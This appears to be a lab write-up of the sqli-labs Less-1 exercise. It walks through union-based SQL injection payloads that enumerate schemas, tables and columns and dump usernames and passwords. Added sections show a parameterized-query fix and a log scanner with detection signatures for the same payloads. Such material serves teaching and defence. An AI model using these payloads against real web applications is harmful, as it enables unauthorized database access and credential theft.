Enumerate databases: select schema_name from information_schema.schemata
Enumerate tables: select table_name from information_schema.tables where table_schema='security'
Enumerate columns: select column_name from information_schema.columns where table_name='users'
Dump fields: select username,password from security.users
group_concat returns the whole result set as a single row
less-1:
SELECT * FROM users WHERE id='1' LIMIT 0,1
Union query
?id=-1' union select 1,2, schema_name from information_schema.schemata--+
The statement becomes:
SELECT * FROM users WHERE id='-1' union select 1,2, schema_name from information_schema.schemata--+' LIMIT 0,1
At this point only the first row is returned by default; to see the rows one at a time you have to query with limit 0,1 / limit 1,1 / limit 2,1 / ... in turn
For example
?id=-1' union select 1,2, schema_name from information_schema.schemata limit 1,1--+ //returns the contents of the second row
Using group_concat()
?id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata --+
The statement becomes:
SELECT * FROM users WHERE id='-1' union select 1,2,group_concat(schema_name) from information_schema.schemata -- ' LIMIT 0,1
Now everything that comes back is on a single row
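The less-1 statement above is vulnerable only because the id value is pasted into the SQL text, so the quote, the union and the trailing comment are parsed as SQL. The following added example (not code from sqli-labs or from this writeup) reproduces that pattern on an in-memory SQLite table and places it next to the parameterized form that fixes it; the same group_concat payload the page uses returns the whole column from the vulnerable lookup and nothing at all from the bound-parameter lookup. The users table, its three rows and the function names are constructed for the demonstration.

```python
import sqlite3

# Constructed sample data standing in for the lab's security.users table (assumption).
SAMPLE_USERS = [
    (1, "Dumb", "Dumb"),
    (2, "Angelina", "I-kill-you"),
    (3, "Dummy", "p@ssword"),
]


def make_db():
    """Build an in-memory database with a minimal users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    """The less-1 pattern: the request parameter becomes part of the SQL text.

    A value such as  -1' union select 1,2,group_concat(username) from users --+
    closes the quote, appends a UNION that selects from the same table, and
    comments out the original  ' LIMIT 0,1  tail, so the attacker's SELECT
    decides what the page renders.
    """
    sql = f"SELECT * FROM users WHERE id='{user_id}' LIMIT 0,1"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id):
    """Hardened form: the value is bound as a parameter and never parsed as SQL.

    The SQL text is fixed at compile time; whatever the client sends is compared
    against the id column as one opaque value, so the union payload is simply an
    id that does not exist and the query returns no rows.
    """
    sql = "SELECT * FROM users WHERE id=? LIMIT 0,1"
    return conn.execute(sql, (user_id,)).fetchall()


def compare(user_id):
    """Run both lookups on the same input; returns (vulnerable_rows, safe_rows)."""
    conn = make_db()
    try:
        return lookup_vulnerable(conn, user_id), lookup_safe(conn, user_id)
    finally:
        conn.close()


if __name__ == "__main__":
    # Benign input behaves the same in both versions.
    print(compare("1"))
    # The page's group_concat payload only has an effect in the concatenated version.
    payload = "-1' union select 1,2,group_concat(username) from users --+"
    print(compare(payload))
```

SQLite accepts MySQL-style LIMIT offset,count and the group_concat aggregate, so the lab's statement shape runs unchanged; the one thing that differs between the two functions is whether the id travels as text inside the statement or as a bound value beside it.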
After all the databases have been found, look up the tables:
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+
The statement becomes:
SELECT * FROM users WHERE id='-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' -- ' LIMIT 0,1
Because the table_schema='security' condition needs quotes, security can instead be written as hex with a 0x prefix
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479 --+
Next, look up the table's columns:
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
The statement becomes:
SELECT * FROM users WHERE id='-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' -- ' LIMIT 0,1
Look up the fields:
?id=-1' union select 1,2,group_concat(password) from security.users --+
To pull username and password out as pairs, a new function is needed
concat_ws('~',username,password)
displays one username~password
To pull all of them out, use group_concat(concat_ws('~',username,password))
Or use position 2 as well
?id=-1' union select 1,group_concat(username) from security.users,group_concat(password) from security.users --+ //currently does not work, reason unknown
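Every request in this walkthrough leaves the same traits in the web server's access log: a UNION SELECT, a reference to information_schema, group_concat(), a 0x hex literal standing in for a quoted string, and a trailing comment terminator. The added example below (not part of the original writeup) is detection logic a defender can run over access-log lines: it URL-decodes the query string, scores each request against those traits, and only alerts when several of them appear together, so an innocent word such as "union" in a search box is not flagged. The log lines, IP addresses and signature names are constructed for the example.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log lines in common log format (not taken from the page).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /Less-1/?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:07 +0000] "GET /Less-1/?id=-1%27%20union%20select%201,2,group_concat(schema_name)%20from%20information_schema.schemata%20--+ HTTP/1.1" 200 1044
10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /Less-1/?id=-1'+union+select+1,2,group_concat(table_name)+from+information_schema.tables+where+table_schema=0x7365637572697479+--+ HTTP/1.1" 200 980
10.0.0.7 - - [01/Jan/2024:10:00:12 +0000] "GET /search?q=union+station HTTP/1.1" 200 300
"""

# Common log format: client, identity, user, [timestamp], "METHOD target PROTO", status, bytes.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"'
)

# One signature per trait of the union-based information_schema walk described above.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "information_schema": re.compile(r"\binformation_schema\.", re.I),
    "group_concat": re.compile(r"\bgroup_concat\s*\(", re.I),
    "hex_string_literal": re.compile(r"=\s*0x[0-9a-f]{2,}", re.I),
    "comment_terminator": re.compile(r"--(\s|$)"),
}


def decoded_query(target):
    """Return the query string of a request target with %xx and + decoded."""
    return unquote_plus(urlsplit(target).query)


def scan_line(line):
    """Parse one log line and list which signatures its query string matches."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    query = decoded_query(m.group("target"))
    hits = [name for name, rx in SIGNATURES.items() if rx.search(query)]
    return {"ip": m.group("ip"), "timestamp": m.group("ts"), "query": query, "hits": hits}


def scan_log(text, min_hits=2):
    """Return an alert record for every line matching at least min_hits signatures."""
    alerts = []
    for line in text.splitlines():
        result = scan_line(line)
        if result and len(result["hits"]) >= min_hits:
            alerts.append(result)
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["ip"], alert["timestamp"], ",".join(alert["hits"]))
        print("   ", alert["query"])
```

Decoding before matching is the important step: the same payload arrives once with %27 and %20 and once with a raw quote and plus signs, and the hex literal variant avoids quotes altogether, yet all of them score on union_select, information_schema and group_concat once the query string is normalized.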